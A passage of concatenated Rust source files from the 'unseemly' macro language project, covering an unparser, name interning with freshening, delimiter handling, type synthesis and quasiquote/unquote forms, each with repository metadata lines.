crate::ty_compare::underdetermined_form.with(|u| u.clone()); match actl { Node(form, body, _) if form == &undet => { return crate::ty_compare::unification.with(|unif| { let var = body.get_leaf_or_panic(&n("id")).to_name(); let looked_up = unif.borrow().get(&var).cloned(); match looked_up { // Apparently the environment is recursive; `{}`ing it stack-overflows Some(ref clo) => { format!("{} in some environment", clo.it /* , {:#?} clo.env */) } None => format!("¿{}?", var), } }); } _ => {} } // TODO: this really ought to notice when `actl` is ill-formed for `pat`. match (pat, actl) { (&Named(name, ref body), _) => { // TODO: why does the `unwrap_or` case happen once after each variable is printed? unparse_mbe(&*body, context.get_leaf(name).unwrap_or(&ast!((at ""))).c(), context, s) } (&Call(sub_form), _) => unparse_mbe(s.find_or_panic(&sub_form), actl, context, s), (&Anyways(_), _) | (&Impossible, _) => "".to_string(), (&Literal(_, n), _) => n.print(), (&Scan(_, _), &Atom(n)) => n.print(), (&Scan(_, _), _) => "".to_string(), // HACK for `Alt` (&VarRef(ref sub_form), &VariableReference(n)) => { unparse_mbe(&*sub_form, &Atom(n), context, s) } (&VarRef(_), _) => "".to_string(), // HACK for `Alt` (&Seq(ref sub_pats), _) => { let mut prev_empty = true; let mut res = String::new(); for sub_pat in sub_pats { let sub_res = unparse_mbe(&*sub_pat, actl, context, s); if !prev_empty && sub_res != "" { res.push(' '); } prev_empty = sub_res == ""; res.push_str(&sub_res); } res } (&Alt(ref sub_pats), _) => { let mut any_scopes = false; for sub_pat in sub_pats { if let Scope(_, _) = &**sub_pat { any_scopes = true; continue; } let sub_res = unparse_mbe(&*sub_pat, actl, context, s); if sub_res != "" { return sub_res; } // HACK: should use `Option` } // HACK: certain forms don't live in the syntax environment, // but "belong" under an `Alt`, so just assume forms know their grammar: if any_scopes { if let &Node(ref form_actual, ref body, _) = actl { return unparse_mbe(&*form_actual.grammar, actl, body, s); } } return "".to_string(); // Not sure if it's an error, or really just empty } (&Biased(ref lhs, ref rhs), _) => { format!("{}{}", unparse_mbe(lhs, actl, context, s), unparse_mbe(rhs, actl, context, s)) } (&Star(ref sub_pat), _) | (&Plus(ref sub_pat), _) => { let mut first = true; let mut res = String::new(); for marched_ctxt in context.march_all(&node_names_mentioned(&*sub_pat)) { if !first { res.push(' '); } first = false; res.push_str(&unparse_mbe(&*sub_pat, actl, &marched_ctxt, s)); } res } (&Scope(ref form, _), &Node(ref form_actual, ref body, _)) => { if form == form_actual { unparse_mbe(&*form.grammar, actl, body, s) } else { "".to_string() // HACK for `Alt` } } (&Scope(_, _), _) => "".to_string(), // Non-match (&Pick(ref body, _), _) | (&Common(ref body), _) => unparse_mbe(&*body, actl, context, s), (&NameImport(ref body, _), &ExtendEnv(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&NameImport(_, _), _) => format!("[Missing import]→{:#?}←", actl), (&NameImportPhaseless(ref body, _), &ExtendEnvPhaseless(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&NameImportPhaseless(_, _), _) => format!("[Missing import]±→{:#?}←±", actl), (&QuoteDeepen(ref body, _), &QuoteMore(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&QuoteDeepen(_, _), _) => format!("[Missing qm]{:#?}", actl), (&QuoteEscape(ref body, _), &QuoteLess(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&QuoteEscape(_, _), _) => format!("[Missing ql]{:#?}", actl), (&SynImport(ref _lhs_grammar, ref _rhs, _), &Node(_, ref actl_body, _)) => { // TODO: I think we need to store the LHS or the new SynEnv to make this pretty. format!("?syntax import? {}", actl_body) } (&SynImport(_, _, _), _) => "".to_string(), (&Reserved(ref body, _), _) => unparse_mbe(body, actl, context, s), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/name.rs
src/name.rs
#![macro_use] use std::{ cell::RefCell, collections::{HashMap, HashSet}, fmt, string::String, }; /// An interned, freshenable identifier. /// Generally, one creates names with `n()` (short for `Name::global()`); /// two names created this way with the same spelling will be treated as the same name. /// Hygiene comes from freshening (implemented in `alpha.rs`, invoked in `walk_mode.rs`). /// If a name is created in an unusual way that might cause it to collide, /// `Name::gensym()` ensures uniqueness. /// Only names that were copied or clone from the original will compare equal. #[derive(PartialEq, Eq, Clone, Copy, Hash)] pub struct Name { id: usize, } pub struct Spelling { // No two different variables have this the same. Tomatoes may have been added: unique: String, // The original spelling that the programmer chose. orig: String, } thread_local! { // From `Spelling.unique` to `id`s: static id_map: RefCell<HashMap<String, usize>> = RefCell::new(HashMap::new()); // From `id`s to `Spelling`s static spellings: RefCell<Vec<Spelling>> = RefCell::new(vec![]); static printables: RefCell<HashMap<usize, String>> = RefCell::new(HashMap::new()); // The values of `printables`, for lookup purposes. static printables_used: RefCell<HashSet<String>> = RefCell::new(HashSet::new()); // Should we do "naive" freshening for testing purposes? static fake_freshness: RefCell<bool> = RefCell::new(false); } impl crate::runtime::reify::Reifiable for Name { fn ty_name() -> Name { n("Name") } fn reify(&self) -> crate::runtime::eval::Value { val!(ast(at * self)) } fn reflect(v: &crate::runtime::eval::Value) -> Name { extract!((v) crate::runtime::eval::Value::AbstractSyntax = (ref ast) => ast.to_name()) } } impl std::cmp::PartialOrd for Name { fn partial_cmp(&self, other: &Name) -> Option<std::cmp::Ordering> { Some(self.orig_sp().cmp(&other.orig_sp())) } } impl std::cmp::Ord for Name { fn cmp(&self, other: &Name) -> std::cmp::Ordering { self.orig_sp().cmp(&other.orig_sp()) } } // These are for isolating tests of alpha-equivalence from each other. pub fn enable_fake_freshness(ff: bool) { fake_freshness.with(|fake_freshness_| { *fake_freshness_.borrow_mut() = ff; }) } // only available on nightly: // impl !Send for Name {} impl Name { /// Two names that are unequal to each other will have different "spelling"s. /// Tomatoes (🍅) may have been added to the end to ensure uniqueness. pub fn sp(self) -> String { spellings.with(|us| us.borrow()[self.id].unique.clone()) } /// The "original spelling" of a name; the string that was used to define it. These may collide. pub fn orig_sp(self) -> String { spellings.with(|us| us.borrow()[self.id].orig.clone()) } /// This extracts the "original" `Name`, prior to any freshening. /// This is probably not ever the *right* thing to do, but may be needed as a workaround. pub fn unhygienic_orig(self) -> Name { spellings.with(|us| Name::new(&us.borrow()[self.id].orig, false)) } /// Printable names are unique, like names from `sp()`, but generated lazily. /// So, if the compiler freshens some name a bunch of times, producing a tomato-filled mess, /// but only prints one version of the name, it gets to print an unadorned name. /// If absolutely necessary to avoid collision, carrots (🥕) are added to the end. pub fn print(self) -> String { printables.with(|printables_| { printables_used.with(|printables_used_| { printables_ .borrow_mut() .entry(self.id) .or_insert_with(|| { let mut print_version = self.orig_sp(); while printables_used_.borrow().contains(&print_version) { // Graffiti seen at Berkley: "EⒶT YOUR VEGETABLES 🥕" print_version = format!("{}🥕", print_version); } printables_used_.borrow_mut().insert(print_version.clone()); print_version.clone() }) .clone() }) }) } pub fn global(s: &str) -> Name { Name::new(s, false) } pub fn gensym(s: &str) -> Name { Name::new(s, true) } pub fn freshen(self) -> Name { Name::new(&self.orig_sp(), true) } fn new(orig_spelling: &str, freshen: bool) -> Name { let fake_freshness_ = fake_freshness.with(|ff| *ff.borrow()); id_map.with(|id_map_| { let mut unique_spelling = orig_spelling.to_owned(); // Find a fresh version by adding tomatoes, if requested: while freshen && id_map_.borrow().contains_key(&unique_spelling) { unique_spelling = format!("{}🍅", unique_spelling); } if freshen && fake_freshness_ { // Forget doing it right; only add exactly one tomato: unique_spelling = format!("{}🍅", orig_spelling); } let claim_id = || { spellings.with(|spellings_| { let new_id = spellings_.borrow().len(); spellings_.borrow_mut().push(Spelling { unique: unique_spelling.clone(), orig: orig_spelling.to_owned(), }); new_id }) }; // Claim our `unique_spelling` and a fresh ID: let id = *id_map_.borrow_mut().entry(unique_spelling.clone()).or_insert_with(claim_id); Name { id: id } }) } pub fn is(self, s: &str) -> bool { self.sp() == s } pub fn is_name(self, n: Name) -> bool { self.sp() == n.sp() } } impl From<&str> for Name { fn from(s: &str) -> Name { Name::global(s) } } impl From<&String> for Name { fn from(s: &String) -> Name { Name::global(&*s) } } // TODO: move to `ast_walk` // TODO: using `lazy_static!` (with or without gensym) makes some tests fail. Why? /// Special name for negative `ast_walk`ing pub fn negative_ret_val() -> Name { Name::global("⋄") } impl fmt::Debug for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "«{}»", self.sp()) } } impl fmt::Display for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.print()) } } pub fn n(s: &str) -> Name { Name::global(s) } #[test] fn name_interning() { // This test fails under tarpaulin; why? It must be related to `thread_local!` somehow... let a = n("a"); assert_eq!(a, a); assert_eq!(a, n("a")); assert_ne!(a, a.freshen()); assert_eq!(a, a.freshen().unhygienic_orig()); assert_ne!(a, n("x🍅")); assert_ne!(a.freshen(), a.freshen()); assert_ne!(a.freshen().sp(), a.freshen().sp()); assert_ne!(n("a"), n("y")); enable_fake_freshness(true); let x = n("x"); assert_eq!(x, x); assert_eq!(x, n("x")); assert_ne!(x, x.freshen()); // ... but now we the freshened version of `x` is accessible (and doesn't avoid existing names) assert_eq!(x.freshen(), n("x🍅")); assert_eq!(x.freshen(), x.freshen()); // Printable versions are first-come, first-served assert_eq!(a.freshen().print(), "a"); assert_eq!(a.print(), "a🥕"); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/read.rs
src/read.rs
// TODO: This file should be absorbed into `grammar.rs`. custom_derive! { #[derive(Debug,PartialEq,Eq,Clone,Copy,Reifiable)] pub enum DelimChar { Paren, SquareBracket, CurlyBracket } } impl DelimChar { pub fn open(self) -> char { match self { Paren => '(', SquareBracket => '[', CurlyBracket => '{', } } pub fn close(self) -> char { match self { Paren => ')', SquareBracket => ']', CurlyBracket => '}', } } } use self::DelimChar::*; pub fn delim(s: &str) -> DelimChar { match s { "(" | ")" => Paren, "[" | "]" => SquareBracket, "{" | "}" => CurlyBracket, _ => icp!("not a delimiter!"), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/ty.rs
src/ty.rs
// Type synthesis is a recursive traversal of an abstract syntax tree. // It is compositional, // except for binding, which is indicated by ExtendTypeEnv nodes. // These nodes may depend on // the result of type-synthesizing sibling AST nodes // or the actual value of AST nodes corresponding to types // (i.e., type annotations). use crate::{ ast::*, ast_walk::{ walk, LazyWalkReses, WalkRule::{self}, }, form::Form, name::*, util::assoc::Assoc, walk_mode::WalkMode, }; use std::{fmt, rc::Rc}; impl Ast { // TODO: use this more // TODO: make `expd_form` a reference pub fn ty_destructure( &self, expd_form: Rc<Form>, loc: &Ast, ) -> Result<crate::util::mbe::EnvMBE<Ast>, TypeError> { self.destructure(expd_form.clone()) .ok_or(ty_err_val!(UnableToDestructure(self.clone(), expd_form.name) at loc /*TODO*/)) } } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct SynthTy {} } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnpackTy {} } impl WalkMode for SynthTy { fn name() -> &'static str { "SynTy" } type Elt = Ast; type Negated = UnpackTy; type AsPositive = SynthTy; type AsNegative = UnpackTy; type Err = TypeError; type D = crate::walk_mode::Positive<SynthTy>; type ExtraInfo = (); fn get_walk_rule(f: &Form) -> WalkRule<SynthTy> { f.synth_type.pos().clone() } fn automatically_extend_env() -> bool { true } fn walk_var( name: Name, parts: &crate::ast_walk::LazyWalkReses<SynthTy>, ) -> Result<Ast, TypeError> { match parts.env.find(&name) { None => Err(crate::util::err::sp(TyErr::UnboundName(name), parts.this_ast.clone())), // If name is protected, stop: Some(ty) if &VariableReference(name) == ty.c() => Ok(ty.clone()), Some(ref ty) => synth_type(ty, parts.env.clone()), } } // Simply protect the name; don't try to unify it. fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl WalkMode for UnpackTy { fn name() -> &'static str { "UnpTy" } type Elt = Ast; type Negated = SynthTy; type AsPositive = SynthTy; type AsNegative = UnpackTy; type Err = TypeError; type D = crate::walk_mode::Negative<UnpackTy>; type ExtraInfo = (); fn get_walk_rule(f: &Form) -> WalkRule<UnpackTy> { f.synth_type.neg().clone() } fn automatically_extend_env() -> bool { true } fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl crate::walk_mode::NegativeWalkMode for UnpackTy { fn needs_pre_match() -> bool { true } } pub fn synth_type_top(expr: &Ast) -> TypeResult { walk::<SynthTy>(expr, &LazyWalkReses::new_wrapper(Assoc::new())) } pub fn synth_type(expr: &Ast, env: Assoc<Name, Ast>) -> TypeResult { walk::<SynthTy>(expr, &LazyWalkReses::new_wrapper(env)) } pub fn neg_synth_type(pat: &Ast, env: Assoc<Name, Ast>) -> Result<Assoc<Name, Ast>, TypeError> { walk::<UnpackTy>(pat, &LazyWalkReses::new_wrapper(env)) } // TODO: Rename this. (Maybe `TypeComplaint`?) custom_derive! { #[derive(Reifiable, Clone, PartialEq)] pub enum TyErr { Mismatch(Ast, Ast), // got, expected LengthMismatch(Vec<Ast>, usize), NtInterpMismatch(Name, Name), NonexistentEnumArm(Name, Ast), NonexistentStructField(Name, Ast), NonExhaustiveMatch(Ast), UnableToDestructure(Ast, Name), UnboundName(Name), // TODO: the reification macros can't handle empty `enum` cases. Fix that! AnnotationRequired(()), NeedsDriver(()), // TODO: replace all uses of `Other` with more specific errors: Other(String) } } impl fmt::Display for TyErr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { use self::TyErr::*; match *self { Mismatch(ref got, ref exp) => { write!(f, "[Mismatch] got:\n `{}`\n expected:\n `{}`\n", got, exp) } LengthMismatch(ref got, exp_len) => { write!(f, "[LengthMismatch] got:\n ")?; for g in got { write!(f, "{}, ", g)?; } write!(f, "\n expected {} arguments.\n", exp_len) } NtInterpMismatch(got, exp) => write!( f, "[NtInterpMismatch] expected the nonterminal `{}`, but `{}` was interpolated", exp, got ), NonexistentEnumArm(got_name, ref ty) => write!( f, "[NonexistentEnumArm] the enum `{}` doesn't have an arm named `{}`", ty, got_name ), NonexistentStructField(got_name, ref ty) => write!( f, "[NonexistentStructField] the struct `{}` doesn't have a field named `{}`", ty, got_name ), NonExhaustiveMatch(ref ty) => { write!(f, "[NonExhaustiveMatch] non-exhaustive match of `{}`", ty) } UnableToDestructure(ref ty, expected_name) => { write!(f, "[UnableToDestructure] expected a `{}` type, got `{}`", expected_name, ty) } UnboundName(name) => write!(f, "[UnboundName] `{}` is not defined", name), AnnotationRequired(()) => write!( f, "[AnnotationRequired] Negative syntax (e.g. a pattern) inside positive syntax \ (e.g. an expression) requires a type annotation." ), NeedsDriver(()) => write!(f, "[NeedsDriver] Repetition needs a driver"), Other(ref s) => write!(f, "[Other] {}", s), } } } // temporary, until we get rid of `Debug` as the way of outputting errors impl fmt::Debug for TyErr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } // TODO: I hope I don't need this // impl From<()> for TyErr { // fn from(_: ()) -> TyErr { // panic!("Tried to discard a type error"); // } // } pub type TypeError = crate::util::err::Spanned<TyErr>; pub type TypeResult = Result<Ast, TypeError>; pub fn expect_type(expected: &Ast, got: &Ast, loc: &Ast) -> Result<(), TypeError> { if got != expected { Err(crate::util::err::Spanned { loc: loc.clone(), body: TyErr::Mismatch(expected.clone(), got.clone()), }) } else { Ok(()) } } #[test] fn basic_type_synth() { use crate::ast_walk::WalkRule::*; let mt_ty_env = Assoc::new(); let int_ty = ast!({ crate::core_forms::find_core_form("Type", "Int"); }); let nat_ty = ast!({ crate::core_forms::find_core_form("Type", "Nat"); }); let simple_ty_env = mt_ty_env.set(n("x"), int_ty.clone()); let body = basic_typed_form!(atom, Body(n("body")), NotWalked); let untypeable = basic_typed_form!(atom, NotWalked, NotWalked); assert_eq!(synth_type(&ast!((vr "x")), simple_ty_env.clone()), Ok(int_ty.clone())); assert_eq!( synth_type( &ast!({body.clone() ; ["irrelevant" => {untypeable.clone() ; }, "body" => (vr "x")]}), simple_ty_env.clone() ), Ok(int_ty.clone()) ); assert_eq!( synth_type( &ast!({body.clone() ; "type_of_new_var" => (, int_ty.clone()), "new_var" => "y", "body" => (import ["new_var" : "type_of_new_var"] (vr "y"))}), simple_ty_env.clone() ), Ok(int_ty.clone()) ); assert_eq!( synth_type( &ast!({ basic_typed_form!( atom, Custom(Rc::new(Box::new(|_| Ok(ast!({ crate::core_forms::find_core_form("Type", "Nat"); }))))), NotWalked ); [] }), simple_ty_env.clone() ), Ok(nat_ty.clone()) ); let chained_ty_env = assoc_n!("a" => ast!((vr "B")), "B" => ast!((vr "C")), "C" => ast!({"Type" "Int":})); assert_eq!(synth_type(&ast!((vr "a")), chained_ty_env), Ok(ast!({"Type" "Int":}))); } #[test] fn type_specialization() { let nat_ty = ast!( { "Type" "Nat" : }); fn tbn(nm: &'static str) -> Ast { ast!((vr nm)) } let _para_ty_env = assoc_n!( "some_int" => ast!( { "Type" "Int" : }), "convert_to_nat" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, tbn("t") ) ], "ret" => (, nat_ty.clone() ) })}), "identity" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, tbn("t") ) ], "ret" => (, tbn("t") ) })})); // assert_eq!(synth_type(&ast!({ "Expr" "apply" : // "rator" => (vr "convert_to_nat"), // "rand" => [ (vr "some_int") ] // }), para_ty_env.clone()), // Ok(ast!( { "Type" "Nat" : }))); // assert_eq!(synth_type(&ast!({ "Expr" "apply" : // "rator" => (vr "identity"), // "rand" => [ (vr "some_int") ] // }), para_ty_env.clone()), // Ok(ast!( { "Type" "Int" : }))); // TODO: test that ∀ X. ∀ Y. [ X → Y ] is a (sortof) sensible type (for transmogrify) // and that ∀ X. [ X → ∀ Y . Y ] is ridiculously permissive }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_qq_forms.rs
src/core_qq_forms.rs
use crate::{ ast, ast::{Ast, AstContents::*}, ast_walk::WalkRule::*, core_type_forms::{less_quoted_ty, more_quoted_ty, nt_is_positive, nt_to_type}, form::{Both, Form, Negative, Positive}, grammar::FormPat, name::*, runtime::eval::{Destructure, Eval, QQuote, QQuoteDestr}, util::assoc::Assoc, walk_mode::{NegativeWalkMode, WalkMode}, }; use std::rc::Rc; // == Types and syntax quotation: when are annotations needed? == // Expressions are "positive", and are traversed leaf-to-root in an environment, producing a type. // Patterns are "negative", and are traversed root-to-leaf from a type, producing an environment. // (`match` and `lambda` are examples of interactions between expressions and patterns.) // Syntax quotation and unquotation embeds expressions/patterns // (at a different phase, which matters suprisingly little) // inside expressions/patterns. // // This looks like: // pattern outside | expression outside <-- (provides context) // -------------------------------------- // pattern inside | ok | needs annotation // expression inside | bonus check | ok // // Examples of needed annotation: // // (frobnicate_pat '[Pat<List<Int>> | (cons a b)]') // In this case, we need to know the type of the syntax quote, // but the pattern also wants to know its own type so that it can tell us its environment. // // match stx { '[Expr | 1 + 5 * ,[Expr<Nat> | stx_num], ]' => ... } // In this case (looking at the expression interpolation), // we need to know the type of the interpolated expression syntax // (a pattern, even though it's a pattern *for* an expression) // in order to type-synthesize the arithmetic. // // // Examples of when we get to do a bonus typecheck: // // match stx { '[Expr | f x]' => ... } // In this case, we can check that the type of the scrutinee // (which is the type of the syntax quotation pattern) // equals `Expr< (whatever `f` returns) >`. // // optimize_expr '[Expr | match stx { ,[my_pat], => ... } ]' // In this case (looking at the Pat interpolation), // we can check that the type of the quoted scrutinee is the same as // the type of `my_pat` (after peeling off its `Pat<>`). // // Note that it doesn't matter whether the boundary is a quotation or an unquotation! // The phase only matters inasmuch as variables don't leave their phase. // There's a nice-seeming syntax for determining what `unquote` does when quotation is nested. // However, it would require some weird additional power for the parser: // '[Expr | '[Expr | ,[…], ,,[…],, ]']' // OTOH, if you are using `,,,,[],,,,`, something has gone terribly wrong. // == Opacity! == // Basically, ` ,[Expr<T> | a ], ` dumps an expression with the type `T` into the type checker, // but at a different phase from where `T` was defined. // We don't want to capture the whole environment, // so we want the typechecker to treat `T` opaquely (i.e. without looking up), // which is what "mu_type" does. // This walk installs (or removes) "mu_type"s on any free variables fn adjust_opacity(t: &Ast, env: Assoc<Name, Ast>, delta: i32) -> Ast { let ctxt = crate::ast_walk::LazyWalkReses { extra_info: delta, ..crate::ast_walk::LazyWalkReses::new_wrapper(env) }; crate::ast_walk::walk::<MuProtect>(t, &ctxt).unwrap() } fn remove_opacity(t: &Ast, delta: i32) -> Ast { if delta > 0 { icp!() } // The environment doesn't matter when removing opacity adjust_opacity(t, Assoc::new(), delta) } // This walk is for one very simple purpose: to add `mu` around unbound names. custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct MuProtect {} } // Sadly, we have to define a negative version, even though it's never used. custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnusedNegativeMuProtect {} } fn change_mu_opacity(parts: crate::ast_walk::LazyWalkReses<MuProtect>) -> Result<Ast, ()> { let delta = parts.extra_info; let opacity = &parts .maybe_get_term(n("opacity_for_different_phase")) .map(|a| a.to_name().sp().parse::<i32>().unwrap()); if let Some(opacity) = opacity { if opacity + delta < 0 { icp!("unwrapped too far") } if opacity + delta == 0 { return Ok(crate::core_forms::strip_ee(&parts.get_term(n("body"))).clone()); } } Ok(parts.this_ast.c_map(&|c| match c { ast::Node(f, mu_parts, export) => { let mut mu_parts = mu_parts.clone(); if let Some(opacity) = opacity { mu_parts.add_leaf( n("opacity_for_different_phase"), ast!((at n(&(opacity + delta).to_string()))), ); } ast::Node(f.clone(), mu_parts, export.clone()) } _ => icp!(), })) } impl WalkMode for MuProtect { fn name() -> &'static str { "MProt" } type Elt = Ast; type Negated = UnusedNegativeMuProtect; type AsPositive = MuProtect; type AsNegative = UnusedNegativeMuProtect; type Err = (); type D = crate::walk_mode::Positive<MuProtect>; type ExtraInfo = i32; fn get_walk_rule(f: &Form) -> crate::ast_walk::WalkRule<MuProtect> { if f.name == n("mu_type") { cust_rc_box!(change_mu_opacity) } else { LiteralLike } } fn automatically_extend_env() -> bool { true } fn walk_var(name: Name, parts: &crate::ast_walk::LazyWalkReses<MuProtect>) -> Result<Ast, ()> { if parts.extra_info <= 0 { return Ok(ast!((vr name))); } if parts.env.find(&name) == None { return Ok(ast!({"Type" "mu_type" : "opacity_for_different_phase" => (at &parts.extra_info.to_string()), "param" => [(import [prot "param"] (vr name))], "body" => (import [* [prot "param"]] (vr name))})); } else { return Ok(ast!((vr name))); } } // TODO: it seems like we always need to define this; think about this more. fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl WalkMode for UnusedNegativeMuProtect { fn name() -> &'static str { "XXXXX" } type Elt = Ast; type Negated = MuProtect; type AsPositive = MuProtect; type AsNegative = UnusedNegativeMuProtect; type Err = (); type D = crate::walk_mode::Negative<UnusedNegativeMuProtect>; type ExtraInfo = i32; fn get_walk_rule(_: &Form) -> crate::ast_walk::WalkRule<UnusedNegativeMuProtect> { icp!() } fn automatically_extend_env() -> bool { icp!() } } impl NegativeWalkMode for UnusedNegativeMuProtect { fn needs_pre_match() -> bool { panic!() } } // Technically, we could have the parser decide whether `unquote` is allowed. // (It only makes sense inside a `quote`.) // However, this would leave us with one `unquote` form available per level of quotation /// Generate a (depth-1) unquoting form. /// `pos_quot` is true iff the quotation itself (and thus the interpolation) is positive. pub fn unquote(nt: Name, pos_quot: bool) -> Rc<FormPat> { Rc::new(FormPat::Scope( unquote_form(nt, pos_quot, 1), if pos_quot { crate::beta::ExportBeta::Nothing } else { crate::beta::ExportBeta::Use(n("body")) }, )) } pub fn unquote_form(nt: Name, pos_quot: bool, depth: u8) -> Rc<Form> { let form_delim_start = &format!("{}[", ",".repeat(depth as usize)); Rc::new(Form { name: n("unquote"), grammar: // It's a pain to determine whether type annotation is needed at syntax time, // so it's optional Rc::new(if pos_quot { form_pat!((delim form_delim_start, "[", [(named "nt", (anyways (vr nt))), (alt [], [(name_lit__by_name nt), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)"), (lit "|")]), (named "body", (-- depth (call "Expr")))])) } else { form_pat!((delim form_delim_start, "[", [(named "nt", (anyways (vr nt))), (alt [], [(name_lit__by_name nt), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)"), (lit "|")]), (named "body", (-- depth (call "Pat")))])) }), type_compare: Positive(NotWalked), // this is not a type form synth_type: // `nt_is_positive` and `pos_quot` have opposite roles from `quote` if nt_is_positive(nt) { // For example: (this quotation could be positive or negative) // (nt_is_positive is true in this example, though) // ` '[Expr | .[a : Int . ,[Expr<String> | body], ]. ]' ` // ^^^^^^^^^^^^^^^^^^^^^^^ Positive( // `body` has the type `Expr<String>` (annotation is superfluous): cust_rc_box!( move | unquote_parts | { let ast_for_errors = unquote_parts.get_term(n("body")); let res = if pos_quot { // TODO: check annotation if present let mut res = unquote_parts.get_res(n("body"))?; // `Expr<String>` for _ in 0..(depth-1) { res = less_quoted_ty(&res, None, &ast_for_errors)?; } // HACK: we only know the last `nt` to expect less_quoted_ty(&res, Some(nt), &ast_for_errors)? } else { // need a type annotation if !unquote_parts.has(n("ty_annot")) { ty_err!(AnnotationRequired (()) at unquote_parts.this_ast); } let expected_type = unquote_parts.get_res(n("ty_annot"))?; let mut ctxt_elt = expected_type.clone(); for _ in 0..(depth-1) { unimplemented!("We may need a stack of what NTs are quoted") } ctxt_elt = more_quoted_ty(&ctxt_elt, nt); let negative_parts = unquote_parts.switch_mode::<crate::ty::UnpackTy>(); let _res = negative_parts.with_context(ctxt_elt).get_res(n("body"))?; expected_type }; Ok(adjust_opacity(&res, unquote_parts.env, i32::from(depth))) })) } else { // For example: ` '[Pat | (x, ,[Pat<String> | body], ) ]' ` // ^^^^^^^^^^^^^^^^^^^^^^ Negative( cust_rc_box!( move | unquote_parts | { let ast_for_errors = unquote_parts.get_term(n("body")); let ctxt_elt = remove_opacity(unquote_parts.context_elt(), -(i32::from(depth))); let mut ctxt_elt = ctxt_elt; for _ in 0..(depth-1) { unimplemented!("We may need a stack of what NTs are quoted") } ctxt_elt = more_quoted_ty(&ctxt_elt, nt); if pos_quot { // `String` let lq_parts = unquote_parts.switch_mode::<crate::ty::SynthTy>(); let res = lq_parts.get_res(n("body"))?; // Bonus typecheck ty_exp!(&ctxt_elt, &res, ast_for_errors); Ok(Assoc::new()) // TODO: this seems like it shouldn't be empty } else { // phase-shift the context_elt: let _res = unquote_parts.with_context(ctxt_elt).get_res(n("body"))?; Ok(Assoc::new()) // TODO: does this make sense? } }) ) }, // Also, let's suppose that we have something like: // let some_pattern : pat<int> = ... // let s = '[{pat} struct { a: ,[ some_pattern ], b: b_var} ]' // ...what then? eval: Both(NotWalked, NotWalked), // Outside a quotation? Makes no sense! quasiquote: // TODO #26: this and "dotdotdot" are the only forms that *aren't* `LiteralLike` Both( // TODO: double-check that `pos` and `neg` don't matter here cust_rc_box!( move | unquote_parts | { let lq_parts = unquote_parts.switch_mode::<Eval>(); crate::ast_walk::walk::<Eval>(lq_parts.get_term_ref(n("body")), &lq_parts) }), cust_rc_box!( move | unquote_parts | { let context = unquote_parts.context_elt().clone(); let lq_parts = unquote_parts.switch_mode::<Destructure>(); crate::ast_walk::walk::<Destructure>(lq_parts.get_term_ref(n("body")), &lq_parts.with_context(context)) })) }) } // Macro By Example transcription. TODO: currently positive-only // There are two parts to the way that Macro By Example works in Unseemly. // // The first is the types and how to construct them: // If `T` is `**[Int Float]**, // then `:::[T >> Expr<T> ]:::` is `**[Expr<Int> Expr<Float>]**`. // If you match syntax under a `*`, you'll get something like `::[T >> Expr<T> ]:::`. // // The second is how we use them: // In a syntax quotation, you can write `...[,x, >> some_syntax]...` pub fn dotdotdot(nt: Name) -> Rc<FormPat> { Rc::new(FormPat::Scope(dotdotdot_form(nt), crate::beta::ExportBeta::Nothing)) } // Once it's possible to write `where Mode::Elt = Ast and Mode::Err = <whatever>`, // this can be turned into a function. // The behavior of `...[]...` is identical in positive and negative modes. macro_rules! ddd_type__body { ($ddd_parts:expr) => { { let drivers : Vec<Name> = $ddd_parts.get_rep_term(n("driver")).into_iter().map(|a| { match a.c() { QuoteLess(ref d, _) => d.vr_to_name(), _ => icp!() } }).collect(); // HACK: we want to operate on the environment one level less quoted // (that's why we put commas around the drivers) // Not sure what how OEH interacts with this. Doesn't matter in the positive case. let (_, ddd_parts_uq) = $ddd_parts.quote_less(); let mut walked_env = Assoc::new(); let repeats = match ddd_parts_uq.env.find(&drivers[0]) { Some(ast) => { match ast.c() { &Node(ref form, ref parts, _) if form.name == n("tuple") => { parts.get_rep_leaf_or_panic(n("component")).len() } // TODO: what if some are `tuple` and others are `dotdotdot`? &Node(ref form, _, _) if form.name == n("dotdotdot") => 1, _ => { ty_err!(UnableToDestructure(ast.clone(), n("tuple")) at ddd_parts_uq.this_ast); } } } _ => ty_err!(UnboundName(drivers[0]) at ddd_parts_uq.this_ast), }; // 